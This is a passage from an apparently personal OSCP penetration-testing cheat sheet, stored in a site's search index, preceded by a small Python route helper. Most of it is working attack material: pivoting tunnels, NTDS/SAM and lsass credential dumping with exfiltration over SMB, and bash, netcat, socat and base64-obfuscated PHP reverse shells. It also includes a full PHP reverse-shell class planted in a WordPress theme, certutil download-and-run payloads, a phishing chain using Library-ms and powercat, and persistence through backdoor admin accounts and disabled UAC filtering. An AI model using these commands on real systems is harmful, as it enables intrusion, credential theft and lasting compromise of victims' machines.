the network prefix would be /24. 
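The mask-to-prefix step above is easy to get wrong by hand for masks other than 255.255.255.0. The following helper is an added example (not from the original notes) that converts a dotted netmask into a prefix length, checks that the mask is contiguous, derives the network address with Python's standard `ipaddress` module, and builds the `ip route add ... dev ligolo` line used in the next step. The function names and the sample IP/mask values are my own.

```python
import ipaddress


def prefix_length(mask: str) -> int:
    """Convert a dotted-decimal netmask (e.g. 255.255.255.0) into a CIDR
    prefix length (24).  Raises ValueError if the mask has holes in it."""
    mask_int = int(ipaddress.IPv4Address(mask))
    ones = bin(mask_int).count("1")
    # A valid mask is `ones` set bits followed only by zero bits.
    expected = (0xFFFFFFFF << (32 - ones)) & 0xFFFFFFFF
    if mask_int != expected:
        raise ValueError(f"non-contiguous netmask: {mask}")
    return ones


def network_for(ip: str, mask: str) -> str:
    """Return the network in CIDR form for a host IP and its netmask.
    strict=False lets ipaddress zero out the host bits for us."""
    net = ipaddress.IPv4Network(f"{ip}/{prefix_length(mask)}", strict=False)
    return str(net)


def ligolo_route_cmd(ip: str, mask: str, iface: str = "ligolo") -> str:
    """Build the route command for the ligolo tun interface."""
    return f"sudo ip route add {network_for(ip, mask)} dev {iface}"


if __name__ == "__main__":
    # Constructed sample values: an agent with this IP/mask inside the pivot network.
    print(ligolo_route_cmd("172.16.122.10", "255.255.255.0"))
    print(ligolo_route_cmd("10.10.10.37", "255.255.252.0"))
```

Note that `strict=False` matters: `IPv4Network("172.16.122.10/24")` would otherwise raise because the host bits are set.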
Create the interface for ligolo in my Kali sudo ip tuntap add user [kali_user] mode tun ligolo sudo ip link set ligolo up Enable the proxy server on the attacker machine # The option -selfcert is for not using a certificate (this will make our communications in clear text), we do not need to encrypt them for the exam. ./ligolo_proxy_linux -selfcert or ./ligolo_proxy_linux -selfcert -port \u0026lt;DIFFERENT_PROXY_PORT\u0026gt; Download (bring) the agent program to the victim (in this example Windows) iwr -uri http://[attacker_ip]/ligolo_agent_windows.exe -UseBasicParsing -Outfile ligolo_agent_windows.exe Start the client # The port is the default one, we could also change it if needed. ./ligolo_agent_windows.exe -connect [attacker_ip]:11601 -ignore-cert or ./ligolo_agent_windows.exe -connect [attacker_ip]:\u0026lt;DIFFERENT_PROXY_PORT\u0026gt; -ignore-cert Add the route in the Kali # Run this command in other terminal that from the one where ligolo proxy is running sudo ip route add [internal_submask]/24 dev ligolo # Verify routing table ip route list Finish setting up the tunneling session # Run this commands in the ligolo proxy terminal Â» session Â» start # After this the tunneling should be ready, you could perform any command. 
Now to Access a port inside one of the machines lets say 192.168.122.121 â€”\u0026gt; 172.16.122.10 ( 127.0.0.1 : 80 )\nWhen you run listener_add in ligolo, it binds to the agent\u0026rsquo;s localhost (the machine running ligolo_agent.exe), not arbitrary machines in the subnet.\nSo if your agent is on 172.16.122.10, this:\nRun ligolo_agent.exe on each target (172.16.122.10, 172.16.122.11, etc.), then: bash Copy Â» session # see all sessions Â» session 1 # select 172.16.122.10 Â» listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80 --tcp Â» session 2 # select 172.16.122.11 Â» listener_add --addr 0.0.0.0:8081 --to 127.0.0.1:80 --tcp Access: 172.16.122.10\u0026#39;s localhost:80 â†’ http://kali:8080 172.16.122.11\u0026#39;s localhost:80 â†’ http://kali:8081 Option 2: Double Pivot (Agent on .10 reaches .11\u0026#39;s localhost) Another method to access\nWe set up ligolo first\nsudo ip tuntap add user kali mode tun ligolo sudo ip link set ligolo up ligolo-proxy -selfcert On target\n.\\agent.exe -connect 192.168.10.10:11601 -ignore-cert add route to the subnet\nsudo ip route add 10.10.10.0/24 dev ligolo tunnel_start Now to access something thats inside the localhost of a subnet\nTransfer chisel.exe to victim and then\nlisten_add -addr 0.0.0.0:8888 --to 127.0.0.1:8000 Turn off the firewall\nnetsh advfirewall set allprofiles state off and then run the chisel server on kali\nchisel server --reverse --port 8000 then on the victim\n.\\chisel.exe client 10.10.10.102:8888 R:localhost:127.0.0.1:1433 Sensitive Store / Dumps # SEBackupPrivilege # On kali create a file called viper.dsh with the content set context persistent nowriters add volume c: alias viper create expose %viper% x: unix2dos viper.dsh cd c:\\\\windows\\\\tasks powershell -c iwr -url \u0026lt;http://10.10.10.10/viper.dsh\u0026gt; -o viper.dsh or setup smb share, set it up anwyas\nimpacket-smbserver share ./ -smb2support -user test -pass \u0026#39;\u0026#39; and then\ndiskshadow /s viper.dsh robocopy /b 
x:\\\\windows\\\\ntds . ntds.dit reg save hklm\\\\system c:\\\\windows\\\\tasks\\\\system reg save hklm\\\\sam c:\\\\windows\\\\tasks\\\\sam net use \\\\\\\\10.10.10.10.\\\\share /user:test copy sam, ntds.dit, system \\\\\\\\10.10.10.10\\\\share and now finally dump it\nimpacket-secretsdump -ntds ntds.dit -system system -sam sam local | tee dmp.txt netexec - Hashdump - CREDS # netexec smb $target -u \u0026#39;admin\u0026#39; -p \u0026#39;Password\u0026#39; -M nanodump --\u0026gt; to dump lsass netexec smb $target -u \u0026#39;admin\u0026#39; -p \u0026#39;Password\u0026#39; -M lsassy netexec smb $target -u \u0026#39;admin\u0026#39; -p \u0026#39;Password\u0026#39; --lsa --\u0026gt; LSA creds nxc smb 192.168.1.0/24 -u UserName -p \u0026#39;PASSWORDHERE\u0026#39; --sam nxc ldap \u0026lt;ip addr\u0026gt; -u -p --laps --\u0026gt; LAPS nxc ldap \u0026lt;ip addr\u0026gt; -u -p -M laps --\u0026gt; LAPS netexec smb $target -u \u0026#39;admin\u0026#39; -p \u0026#39;Password\u0026#39; --ntds if creds dont work try --local-auth if lsa hash then u have to crack it if ntlm hash then visit ntlm.pw john --wordlist=/usr/share/wordlists/rockyou.txt --format=mscash2 mscash_hashes Keepass # keepass2john keepass2john CEH.kdbx \u0026gt; CEH.kdbx.hash hashcat CEH.kdbx.hash /usr/share/wordlists/rockyou.txt strings -e S KeePassDumpFull.dmp | grep -a $(printf \u0026#34;%b\u0026#34; \u0026#34;\\\\\\\\xCF\\\\\\\\x25\\\\\\\\xCF\\\\\\\\x25\u0026#34;) go windows and dotnet run the .dmp file or when only kdbx file is there use john or hashcat to crack it keepass2john passcodes.kdbx hashcat hash.txt /usr/share/wordlists/rockyou.txt --user -m 13400 and then use it with kplci kpcli --kdb CEH.kdbx show -f [num] 6. 
Shells # webshell aspx # /usr/share/webshells/aspx/cmdasp.aspx simple cron # #!/bin/bash cp /bin/bash /tmp/bash chmod +s /tmp/bash then sudo the command /tmp/bash -p postgres revshell # https://github.com/squid22/PostgreSQL_RCE Linux Upgrade # python -c \u0026#39;import pty; pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; stty raw -echo; fg export TERM=xterm echo $SHELL ps -p $$ -o comm= stty -a stty raw -echo;fg â€”\u0026gt; hit enter twice stty rows stty cols cat /etc/shells python â€”version then if u have bin/sh u can do python -c â€˜import pty; pty.spawn(â€/bin/bashâ€)â€™ otherwise do perl help and if perl is there perl -e â€˜exec â€œ/bin/bashâ€; â€˜ or ruby: exec â€œ/bin/bashâ€ /bin/bash -i script /dev/null -c bash export TERM=xterm stty rows 40 columns 120 Base64 # base64 -d password.txt Python reverse shell # python -c \u0026#39;import socket,os,pty;s=socket.socket();s.connect((\u0026#34;YOUR_HTB_IP\u0026#34;,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; Bash reverse shell # bash -c \u0026#39;bash -i \u0026gt;\u0026amp; /dev/tcp/YOUR_HTB_IP/4444 0\u0026gt;\u0026amp;1\u0026#39; NC reverse shell # nc YOUR_HTB_IP 4444 -e /bin/bash mkfifo /tmp/f; nc YOUR_HTB_IP 4444 \u0026lt; /tmp/f | /bin/bash \u0026gt; /tmp/f 2\u0026gt;\u0026amp;1; rm /tmp/f PHP reverse shell # (Full original pentestmonkey code preserved here exactly as you provided.)\n\u0026lt;?php `echo YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTA0LzQ0NDQgMD4mMSAK|base64 -d |bash`; ?\u0026gt; ?page=phar:///var/www/html/uploads/archive.phar/test.txt ncat # ncat -e /bin/bash 192.168.1.44 1234 BusyBox # http://plan.bitforge.lab/www//upload/files/5hjchl/u69.php?cmd=busybox%20nc%20192.168.45.159%203306%20-e%20bash Socat Upgrade # socat file:`tty`,raw,echo=0 tcp-listen:4444 --\u0026gt;attacker socat exec:\u0026#39;bash -li\u0026#39;,pty,stderr,setsid,sigint,sane tcp:192.168.45.227:4444 --\u0026gt; victim LibreOffice revshell ODT # 
https://medium.com/@Dpsypher/proving-grounds-practice-craft-4a62baf140cc Upgrade Through Python Server # linux # cat \u0026lt;\u0026lt;EOF \u0026gt; rev.sh #!/bin/bash bash -i \u0026gt;\u0026amp; /dev/tcp/192.168.45.181/7777 0\u0026gt;\u0026amp;1 EOF then from the rev shell type\nbash rev.sh RCE → Rev shell # python3 poc.py \u0026lt;ip\u0026gt; \u0026#34;curl http://\u0026lt;your-ip\u0026gt;/shell.sh -o /tmp/shell.sh\u0026#34; python3 poc.py \u0026lt;ip\u0026gt; \u0026#34;chmod +x /tmp/shell.sh\u0026#34; python3 poc.py \u0026lt;ip\u0026gt; \u0026#34;/tmp/shell.sh\u0026#34; windows # certutil -urlcache -split -f http://192.168.45.159/nc.exe C:/Users/Public/Documents/nc.exe cmd.exe /c C:/Users/Public/Documents/nc.exe -e cmd.exe 192.168.45.159 4444 WordPress # msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.150 LPORT=4444 -f exe -o 64.exe we can paste this in the theme header\n\u0026lt;?php exec(\u0026#34;certutil -urlcache -split -f http://192.168.45.176/64.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\64.exe\u0026#34;); exec(\u0026#34;C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\64.exe\u0026#34;); ?\u0026gt; now visit http://192.168.208.55/shenzi/themes/twentytwenty/404.php after editing 404\nor\nediting the theme header with this\n\u0026lt;?php // Copyright (c) 2020 Ivan Sincek // v2.3 // Requires PHP v5.0.0 or greater. // Works on Linux OS, macOS, and Windows OS. // See the original script at https://github.com/pentestmonkey/php-reverse-shell. 
class Shell { private $addr = null; private $port = null; private $os = null; private $shell = null; private $descriptorspec = array( 0 =\u0026gt; array(\u0026#39;pipe\u0026#39;, \u0026#39;r\u0026#39;), // shell can read from STDIN 1 =\u0026gt; array(\u0026#39;pipe\u0026#39;, \u0026#39;w\u0026#39;), // shell can write to STDOUT 2 =\u0026gt; array(\u0026#39;pipe\u0026#39;, \u0026#39;w\u0026#39;) // shell can write to STDERR ); private $buffer = 1024; // read/write buffer size private $clen = 0; // command length private $error = false; // stream read/write error public function __construct($addr, $port) { $this-\u0026gt;addr = $addr; $this-\u0026gt;port = $port; } private function detect() { $detected = true; if (stripos(PHP_OS, \u0026#39;LINUX\u0026#39;) !== false) { // same for macOS $this-\u0026gt;os = \u0026#39;LINUX\u0026#39;; $this-\u0026gt;shell = \u0026#39;bash\u0026#39;; } else if (stripos(PHP_OS, \u0026#39;WIN32\u0026#39;) !== false || stripos(PHP_OS, \u0026#39;WINNT\u0026#39;) !== false || stripos(PHP_OS, \u0026#39;WINDOWS\u0026#39;) !== false) { $this-\u0026gt;os = \u0026#39;WINDOWS\u0026#39;; $this-\u0026gt;shell = \u0026#39;cmd.exe\u0026#39;; } else { $detected = false; echo \u0026#34;SYS_ERROR: Underlying operating system is not supported, script will now exit...\\n\u0026#34;; } return $detected; } private function daemonize() { $exit = false; if (!function_exists(\u0026#39;pcntl_fork\u0026#39;)) { echo \u0026#34;DAEMONIZE: pcntl_fork() does not exists, moving on...\\n\u0026#34;; } else if (($pid = @pcntl_fork()) \u0026lt; 0) { echo \u0026#34;DAEMONIZE: Cannot fork off the parent process, moving on...\\n\u0026#34;; } else if ($pid \u0026gt; 0) { $exit = true; echo \u0026#34;DAEMONIZE: Child process forked off successfully, parent process will now exit...\\n\u0026#34;; } else if (posix_setsid() \u0026lt; 0) { // once daemonized you will actually no longer see the script\u0026#39;s dump echo \u0026#34;DAEMONIZE: Forked off the parent process but cannot 
set a new SID, moving on as an orphan...\\n\u0026#34;; } else { echo \u0026#34;DAEMONIZE: Completed successfully!\\n\u0026#34;; } return $exit; } private function settings() { @error_reporting(0); @set_time_limit(0); // do not impose the script execution time limit @umask(0); // set the file/directory permissions - 666 for files and 777 for directories } private function dump($data) { $data = str_replace(\u0026#39;\u0026lt;\u0026#39;, \u0026#39;\u0026amp;lt;\u0026#39;, $data); $data = str_replace(\u0026#39;\u0026gt;\u0026#39;, \u0026#39;\u0026amp;gt;\u0026#39;, $data); echo $data; } private function read($stream, $name, $buffer) { if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream $this-\u0026gt;error = true; // set global error flag echo \u0026#34;STRM_ERROR: Cannot read from ${name}, script will now exit...\\n\u0026#34;; } return $data; } private function write($stream, $name, $data) { if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream $this-\u0026gt;error = true; // set global error flag echo \u0026#34;STRM_ERROR: Cannot write to ${name}, script will now exit...\\n\u0026#34;; } return $bytes; } // read/write method for non-blocking streams private function rw($input, $output, $iname, $oname) { while (($data = $this-\u0026gt;read($input, $iname, $this-\u0026gt;buffer)) \u0026amp;\u0026amp; $this-\u0026gt;write($output, $oname, $data)) { if ($this-\u0026gt;os === \u0026#39;WINDOWS\u0026#39; \u0026amp;\u0026amp; $oname === \u0026#39;STDIN\u0026#39;) { $this-\u0026gt;clen += strlen($data); } // calculate the command length $this-\u0026gt;dump($data); // script\u0026#39;s dump } } // read/write method for blocking streams (e.g. 
for STDOUT and STDERR on Windows OS) // we must read the exact byte length from a stream and not a single byte more private function brw($input, $output, $iname, $oname) { $fstat = fstat($input); $size = $fstat[\u0026#39;size\u0026#39;]; if ($this-\u0026gt;os === \u0026#39;WINDOWS\u0026#39; \u0026amp;\u0026amp; $iname === \u0026#39;STDOUT\u0026#39; \u0026amp;\u0026amp; $this-\u0026gt;clen) { // for some reason Windows OS pipes STDIN into STDOUT // we do not like that // we need to discard the data from the stream while ($this-\u0026gt;clen \u0026gt; 0 \u0026amp;\u0026amp; ($bytes = $this-\u0026gt;clen \u0026gt;= $this-\u0026gt;buffer ? $this-\u0026gt;buffer : $this-\u0026gt;clen) \u0026amp;\u0026amp; $this-\u0026gt;read($input, $iname, $bytes)) { $this-\u0026gt;clen -= $bytes; $size -= $bytes; } } while ($size \u0026gt; 0 \u0026amp;\u0026amp; ($bytes = $size \u0026gt;= $this-\u0026gt;buffer ? $this-\u0026gt;buffer : $size) \u0026amp;\u0026amp; ($data = $this-\u0026gt;read($input, $iname, $bytes)) \u0026amp;\u0026amp; $this-\u0026gt;write($output, $oname, $data)) { $size -= $bytes; $this-\u0026gt;dump($data); // script\u0026#39;s dump } } public function run() { if ($this-\u0026gt;detect() \u0026amp;\u0026amp; !$this-\u0026gt;daemonize()) { $this-\u0026gt;settings(); // ----- SOCKET BEGIN ----- $socket = @fsockopen($this-\u0026gt;addr, $this-\u0026gt;port, $errno, $errstr, 30); if (!$socket) { echo \u0026#34;SOC_ERROR: {$errno}: {$errstr}\\n\u0026#34;; } else { stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns \u0026#39;true\u0026#39; on Windows OS // ----- SHELL BEGIN ----- $process = @proc_open($this-\u0026gt;shell, $this-\u0026gt;descriptorspec, $pipes, null, null); if (!$process) { echo \u0026#34;PROC_ERROR: Cannot start the shell\\n\u0026#34;; } else { foreach ($pipes as $pipe) { stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns \u0026#39;false\u0026#39; on Windows OS } // ----- 
WORK BEGIN ----- $status = proc_get_status($process); @fwrite($socket, \u0026#34;SOCKET: Shell has connected! PID: \u0026#34; . $status[\u0026#39;pid\u0026#39;] . \u0026#34;\\n\u0026#34;); do { $status = proc_get_status($process); if (feof($socket)) { // check for end-of-file on SOCKET echo \u0026#34;SOC_ERROR: Shell connection has been terminated\\n\u0026#34;; break; } else if (feof($pipes[1]) || !$status[\u0026#39;running\u0026#39;]) { // check for end-of-file on STDOUT or if process is still running echo \u0026#34;PROC_ERROR: Shell process has been terminated\\n\u0026#34;; break; // feof() does not work with blocking streams } // use proc_get_status() instead $streams = array( \u0026#39;read\u0026#39; =\u0026gt; array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR \u0026#39;write\u0026#39; =\u0026gt; null, \u0026#39;except\u0026#39; =\u0026gt; null ); $num_changed_streams = @stream_select($streams[\u0026#39;read\u0026#39;], $streams[\u0026#39;write\u0026#39;], $streams[\u0026#39;except\u0026#39;], 0); // wait for stream changes | will not wait on Windows OS if ($num_changed_streams === false) { echo \u0026#34;STRM_ERROR: stream_select() failed\\n\u0026#34;; break; } else if ($num_changed_streams \u0026gt; 0) { if ($this-\u0026gt;os === \u0026#39;LINUX\u0026#39;) { if (in_array($socket , $streams[\u0026#39;read\u0026#39;])) { $this-\u0026gt;rw($socket , $pipes[0], \u0026#39;SOCKET\u0026#39;, \u0026#39;STDIN\u0026#39; ); } // read from SOCKET and write to STDIN if (in_array($pipes[2], $streams[\u0026#39;read\u0026#39;])) { $this-\u0026gt;rw($pipes[2], $socket , \u0026#39;STDERR\u0026#39;, \u0026#39;SOCKET\u0026#39;); } // read from STDERR and write to SOCKET if (in_array($pipes[1], $streams[\u0026#39;read\u0026#39;])) { $this-\u0026gt;rw($pipes[1], $socket , \u0026#39;STDOUT\u0026#39;, \u0026#39;SOCKET\u0026#39;); } // read from STDOUT and write to SOCKET } else if ($this-\u0026gt;os === \u0026#39;WINDOWS\u0026#39;) { // order is important if 
(in_array($socket, $streams[\u0026#39;read\u0026#39;])/*------*/) { $this-\u0026gt;rw ($socket , $pipes[0], \u0026#39;SOCKET\u0026#39;, \u0026#39;STDIN\u0026#39; ); } // read from SOCKET and write to STDIN if (($fstat = fstat($pipes[2])) \u0026amp;\u0026amp; $fstat[\u0026#39;size\u0026#39;]) { $this-\u0026gt;brw($pipes[2], $socket , \u0026#39;STDERR\u0026#39;, \u0026#39;SOCKET\u0026#39;); } // read from STDERR and write to SOCKET if (($fstat = fstat($pipes[1])) \u0026amp;\u0026amp; $fstat[\u0026#39;size\u0026#39;]) { $this-\u0026gt;brw($pipes[1], $socket , \u0026#39;STDOUT\u0026#39;, \u0026#39;SOCKET\u0026#39;); } // read from STDOUT and write to SOCKET } } } while (!$this-\u0026gt;error); // ------ WORK END ------ foreach ($pipes as $pipe) { fclose($pipe); } proc_close($process); } // ------ SHELL END ------ fclose($socket); } // ------ SOCKET END ------ } } } echo \u0026#39;\u0026lt;pre\u0026gt;\u0026#39;; // change the host address and/or port number as necessary $sh = new Shell(\u0026#39;192.168.45.159\u0026#39;, 4444); $sh-\u0026gt;run(); unset($sh); // garbage collector requires PHP v5.3.0 or greater // @gc_collect_cycles(); echo \u0026#39;\u0026lt;/pre\u0026gt;\u0026#39;; ?\u0026gt; on clicking update we get a shell lol\n7. 
File Transfer # Transferring with SMB # On host impacket-smbserver share ./ -smb2support -user test -pass \u0026#39;\u0026#39; on client net use \\\\\\\\10.10.10.10\\\\share /USER:test copy \\\\\\\\10.10.10.10\\\\share\\\\* Transferring with NC # on kali nc -lvnp 9001 \u0026gt; log.zip on victim nc 10.10.14.82 9001 \u0026lt; 2026-2-9.log.zip do md5sum filename both ways to verify content Transferring with scp # scp /path/to/local/file username@remote_host:/path/to/remote/directory MISC # Client Side Attacks # Library # For this attack, we have to set up a WebDAV server, a Python3 web server, a Netcat listener, and prepare the Windows Library and shortcut files.\nSet up WebDAV share on kali\nmkdir /home/kali/beyond/webdav /home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/beyond/webdav/ Set up Library\nOpen visual studio code, create new file on desktop named as config.Library-ms\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;UTF-8\u0026#34;?\u0026gt; \u0026lt;libraryDescription xmlns=\u0026#34;http://schemas.microsoft.com/windows/2009/library\u0026#34;\u0026gt; \u0026lt;name\u0026gt;@windows.storage.dll,-34582\u0026lt;/name\u0026gt; \u0026lt;version\u0026gt;6\u0026lt;/version\u0026gt; \u0026lt;isLibraryPinned\u0026gt;true\u0026lt;/isLibraryPinned\u0026gt; \u0026lt;iconReference\u0026gt;imageres.dll,-1003\u0026lt;/iconReference\u0026gt; \u0026lt;templateInfo\u0026gt; \u0026lt;folderType\u0026gt;{7d49d726-3c21-4f05-99aa-fdc2c9474656}\u0026lt;/folderType\u0026gt; \u0026lt;/templateInfo\u0026gt; \u0026lt;searchConnectorDescriptionList\u0026gt; \u0026lt;searchConnectorDescription\u0026gt; \u0026lt;isDefaultSaveLocation\u0026gt;true\u0026lt;/isDefaultSaveLocation\u0026gt; \u0026lt;isSupported\u0026gt;false\u0026lt;/isSupported\u0026gt; \u0026lt;simpleLocation\u0026gt; \u0026lt;url\u0026gt;http://192.168.119.5\u0026lt;/url\u0026gt; \u0026lt;/simpleLocation\u0026gt; 
\u0026lt;/searchConnectorDescription\u0026gt; \u0026lt;/searchConnectorDescriptionList\u0026gt; \u0026lt;/libraryDescription\u0026gt; save it and transfer to /home/kali/beyond\nnext create a shortcut file on windows, right click on desktop and select New \u0026gt; Shortcut. A victim double clicking the shortcut file will download powercat and create a revshell.\npowershell.exe -c \u0026#34;IEX(New-Object System.Net.WebClient).DownloadString(\u0026#39;http://192.168.119.5:8000/powercat.ps1\u0026#39;); powercat -c 192.168.119.5 -p 4444 -e powershell\u0026#34; now transfer the shortcut file into the webdav dir in kali\nnow serve powercat via python3 web server\nfrom the dir containing powercat: python3 -m http.server 8000 Now set up the netcat listener\nnc -nlvp 4444 let\u0026#39;s create the email now\nNow we are ready to build the swaks command to send the emails. We\u0026rsquo;ll provide daniela@beyond.com and marcus@beyond.com as recipients of the email to -t, john@beyond.com as name on the email envelope (sender) to --from, and the Windows Library file to --attach. Next, we\u0026rsquo;ll enter --suppress-data to summarize information regarding the SMTP transactions. For the email subject and body, we\u0026rsquo;ll provide Subject: Staging Script to --header and body.txt to --body. In addition, we\u0026rsquo;ll enter the IP address of MAILSRV1 for --server. 
Finally, we\u0026rsquo;ll add -ap to enable password authentication.\nkali@kali:~/beyond$ sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header \u0026#34;Subject: Staging Script\u0026#34; --suppress-data -ap Username: john Password: dqsTwTpZPn#nL Now wait.\nExecuting phar rev shell # ?page=phar:///var/www/html/uploads/archive.phar/test.txt LFI to RCE # https://medium.com/@lashin0x/local-file-inclusion-to-remote-code-execution-rce-bea0ec06342a Using Ars0n # docker-compose up -d localhost:80 and then visit\nhttp://localhost\nOption 1: Create a New Scope Target Best for: Starting fresh reconnaissance on a new target Choose Target Type: Company: Any asset owned by an organization (e.g., \u0026#34;Google\u0026#34;) Wildcard: Any subdomain under the root domain (e.g., \u0026#34;*.google.com\u0026#34;) URL: Specific attack vector targeting a single domain (e.g., \u0026#34;https://hackme.google.com\u0026#34;) Enter Target Information: For Company targets: Enter the company name For Wildcard targets: Enter the wildcard domain pattern For URL targets: Enter the specific URL Begin Reconnaissance: The framework will automatically start gathering intelligence about your target You can then run individual tools or use the Auto Scan feature Option 2: Import Existing Scan Data Best for: Learning from pre-scanned data or resuming previous sessions Import from File: Download a .rs0n file (like those available in the scan data repository) Click \u0026#34;Import Scan Data\u0026#34; in the welcome screen Select \u0026#34;Upload File\u0026#34; and choose your .rs0n file The framework will import all scope targets and associated scan results Import from URL: Click \u0026#34;Import Scan Data\u0026#34; in the welcome screen Select \u0026#34;Import from URL\u0026#34; Enter the raw GitHub URL of a .rs0n file: 
https://github.com/R-s0n/ars0n-framework-v2-scan-data/raw/refs/heads/main/Grammarly/rs0n-export-2025-07-27T18-19-17.rs0n The framework will download and import the data automatically Option 3: Use Pre-Scanned Data for Learning Best for: Understanding the bug bounty hunting process without running scans The Ars0n Framework v2 Scan Data Repository contains real-world scan data that you can import to learn: Subdomain Discovery: How various tools find subdomains and assets Vulnerability Assessment: Common security issues and how they\u0026#39;re identified Attack Surface Mapping: Understanding an organization\u0026#39;s digital footprint Reconnaissance Methodology: The systematic approach to bug bounty hunting Persistence # Adding our user to work with nxc later on\nnet user fatcat fatcat1234 /add net localgroup Administrators fatcat /add net user fatcat /active:yes Enable psexec and wmi\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f Enable evil-winrm\nwinrm quickconfig -q winrm set winrm/config/service/auth @{Basic=\u0026#34;true\u0026#34;} winrm set winrm/config/service @{AllowUnencrypted=\u0026#34;true\u0026#34;} netsh advfirewall firewall add rule name=\u0026#34;WinRM\u0026#34; dir=in action=allow protocol=TCP localport=5985 net start winrm net localgroup \u0026#34;Remote Desktop Users\u0026#34; fatcat /add Access\nimpacket-psexec fatcat:\u0026#39;fatcat1234\u0026#39;@192.168.139.189 impacket-wmiexec fatcat:\u0026#39;fatcat1234\u0026#39;@192.168.139.189 Potatoes # https://jlajara.gitlab.io/Potatoes_Windows_Privesc\nSigmaPotato # # Execute a Command ./SigmaPotato.exe \u0026lt;command\u0026gt; # Establish a PowerShell Reverse Shell ./SigmaPotato.exe --revshell \u0026lt;ip_addr\u0026gt; \u0026lt;port\u0026gt; # Return Help Information ./SigmaPotato.exe --help JuicyPotato # msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=192.168.45.159 LPORT=1338 -f exe -o shell.exe 
.\\Juicy.Potato.x86.exe -t * -p .\\shellx86.exe -l 1338 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} =================================== .\\Juicy.Potato.x86.exe -l 1360 -p c:\\windows\\system32\\cmd.exe -a \u0026#34;/c whoami\u0026#34; -t * if the default doesn\u0026#39;t work use a different one with the -c argument at the end https://github.com/ohpe/juicy-potato/tree/master/CLSID/ wuauserv is a good choice .\\Juicy.Potato.x86.exe -l 1360 -p c:\\windows\\system32\\cmd.exe -a \u0026#34;/c c:\\users\\Public\\nc.exe -e cmd.exe 192.168.45.154 242\u0026#34; -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} GodPotato # .\\godpotato.exe -cmd \u0026#34;nc.exe -e cmd 192.168.45.239 1338\u0026#34; Add our user\nGodPotato.exe -cmd \u0026#34;cmd /c net user dave4 fatcat1234 /add\u0026#34; GodPotato.exe -cmd \u0026#34;cmd /c net localgroup Administrators fatcat /add\u0026#34; net user fatcat /active:yes Enable psexec and wmi by disabling the UAC\nGodPotato.exe -cmd \u0026#34;cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f\u0026#34; and then get in\nimpacket-psexec dave4:\u0026#39;lab12345678$\u0026#39;@192.168.139.189 impacket-wmiexec dave4:\u0026#39;lab12345678$\u0026#39;@192.168.139.189 for winrm\nwinrm quickconfig -q winrm set winrm/config/service/auth @{Basic=\u0026#34;true\u0026#34;} winrm set winrm/config/service @{AllowUnencrypted=\u0026#34;true\u0026#34;} netsh advfirewall firewall add rule name=\u0026#34;WinRM\u0026#34; dir=in action=allow protocol=TCP localport=5985 net start winrm login\nevil-winrm -i 192.168.139.189 -u dave4 -p \u0026#39;lab12345678$\u0026#39; ","externalUrl":null,"permalink":"/tools/tooly-source/","section":"Tools","summary":"","title":"","type":"tools"},{"content":"","externalUrl":null,"permalink":"/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":"Pick a cheatsheet 
below.\n","externalUrl":null,"permalink":"/cheatsheet/","section":"Cheatsheets","summary":"","title":"Cheatsheets","type":"cheatsheet"},{"content":"","externalUrl":null,"permalink":"/categories/enumeration/","section":"Categories","summary":"","title":"Enumeration","type":"categories"},{"content":" Go to # nmap -p- \u0026lt;ip addr\u0026gt; -sCV -A -Pn --min-rate=20000 Going through nmap scripts # ls -al /usr/share/nmap/scripts/ | grep ftp- Top UDP # nmap 10.129.18.188 -sU --top-ports=100 --min-rate=20000 Useful Switches # sn → Ping sweep sS → TCP SYN Pn → Disable host discovery p- → All ports sV → Version detection A → OS detect + scripts + traceroute O → OS detection T4 → Faster scan sC → Default scripts Port Knocking # for i in 571 290 911; do nmap -Pn --host-timeout 100 --max-retries 0 -p $i 10.10.10.43 \u0026gt;/dev/null; done ssh -i ~/keys/id_rsa_nineveh_amrois amrois@10.10.10.43 Filtered Ports # nmap -p- --min-rate 10000 \u0026lt;ip\u0026gt; ","externalUrl":null,"permalink":"/tools/nmap/","section":"Tools","summary":"","title":"nmap","type":"tools"},{"content":" Master Methodology # This page is the live checklist database extracted from my Notion workflow.\n","externalUrl":null,"permalink":"/cheatsheet/oscp-cheatsheet/","section":"Cheatsheets","summary":"","title":"OSCP Cheatsheet","type":"cheatsheet"},{"content":"","externalUrl":null,"permalink":"/series/","section":"Series","summary":"","title":"Series","type":"series"},{"content":"A GTFOBins-style searchable list built from my personal tooling notes.\n","externalUrl":null,"permalink":"/tools/","section":"Tools","summary":"","title":"Tools","type":"tools"}]